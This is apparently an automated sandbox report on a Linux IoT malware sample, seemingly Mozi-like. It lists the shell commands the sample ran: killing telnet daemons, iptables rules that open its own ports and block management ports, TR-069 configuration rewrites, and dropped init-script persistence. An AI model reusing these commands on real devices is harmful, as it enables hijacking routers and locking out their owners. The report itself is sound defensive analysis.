Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1476/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/259/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/1475/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/936/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/30/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/2208/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/35/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5177/stat			Jump to behavior
Source: /usr/bin/killall (PID: 5255)	File opened: /proc/5178/stat			Jump to behavior

Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Source: /tmp/ZFvtIZszMd (PID: 5253)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5277)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5284)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5287)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5292)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5295)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5298)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5301)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5304)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 42337 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5310)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5313)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5316)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5319)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5322)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5324)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5326)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5331)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5334)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5337)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5340)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5343)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5346)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5349)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5352)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5355)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5359)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5362)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5398)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 15453 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5401)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 15453 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5404)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 15453 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5407)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 15453 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5410)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 15453 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5413)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 15453 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5416)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 15453 -j ACCEPT"			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5419)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 15453 -j ACCEPT"			Jump to behavior

Source: /usr/bin/dash (PID: 5196)

Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dvcVrUcqjW /tmp/tmp.b2DlyODsJX /tmp/tmp.FBXdssB42e

Jump to behavior

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection

Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/S95baby.sh			Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/keyboard-setup.sh			Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/console-setup.sh			Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /etc/init.d/hwclock.sh			Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /usr/bin/gettext.sh			Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251)	File: /usr/bin/rescan-scsi-bus.sh			Jump to dropped file

Source: unknown	Network traffic detected: HTTP traffic on port 52454 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 52454
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 37800 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 7574 -> 37800
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 46902 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 8443 -> 37178
Source: unknown	Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 47424 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 47424

Malware Analysis System Evasion

Source: /tmp/ZFvtIZszMd (PID: 5247)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5260)	Queries kernel information via 'uname':			Jump to behavior

Source: ZFvtIZszMd, 5247.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/ZFvtIZszMdSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ZFvtIZszMd
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm.sh.30.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Monitoring qemu job at yet-as-unknown pid
Source: kvm.sh.30.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: QEMU="`identify_qemu vmlinux`"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
Source: ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: ~qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu_args () {
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh2.30.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: ZFvtIZszMd, 5247.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000fe9232f0.000000009560e333.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh2.30.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-aarch64
Source: kvm-recheck-rcu.sh.30.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm.sh.30.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu_vcpus () {
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -z "$qemu_pid" || kill -0 "$qemu_pid" > /dev/null 2>&1
Source: kvm.sh.30.dr	Binary or memory string: print "\tneedqemurun=1"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: # Generate qemu -append arguments
Source: ZFvtIZszMd, 5247.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: functions.sh2.30.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.30.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: kvm.sh.30.dr	Binary or memory string: print "if test -n \"$needqemurun\""
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh2.30.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh2.30.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh2.30.dr	Binary or memory string: identify_qemu () {
Source: parse-console.sh.30.dr	Binary or memory string: print_warning Console output contains nul bytes, old qemu still running?
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh2.30.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-aarch64)
Source: kvm.sh.30.dr	Binary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Unknown PID, cannot kill qemu command
Source: kvm-recheck-lock.sh.30.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.30.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh2.30.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386|qemu-system-aarch64)
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64)
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-aarch64)
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: functions.sh2.30.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_pid=""
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: elif test -z "$qemu_pid"
Source: functions.sh2.30.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: ZFvtIZszMd, 5247.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000fe9232f0.000000009560e333.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.30.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: kvm.sh.30.dr	Binary or memory string: --qemu-args|--qemu-arg)
Source: functions.sh2.30.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MEM=$2
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh2.30.dr	Binary or memory string: specify_qemu_cpus () {
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-i386)
Source: functions.sh2.30.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh2.30.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm.sh.30.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.30.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh2.30.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh2.30.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
Source: functions.sh2.30.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh2.30.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: kvm.sh.30.dr	Binary or memory string: --qemu-cmd)
Source: functions.sh2.30.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.30.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
Source: functions.sh2.30.dr	Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh2.30.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: kvm-test-1-run.sh.30.dr	Binary or memory string: if test -s "$resdir/qemu_pid"

Stealing of Sensitive Information

Source: Yara match	File source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: ZFvtIZszMd, type: SAMPLE
Source: Yara match	File source: 5249.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5249, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5268, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY
Source: Yara match	File source: ZFvtIZszMd, type: SAMPLE
Source: Yara match	File source: 5249.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5268.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5247.1.00000000940d2638.000000002d110c1c.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5249, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZFvtIZszMd PID: 5268, type: MEMORYSTR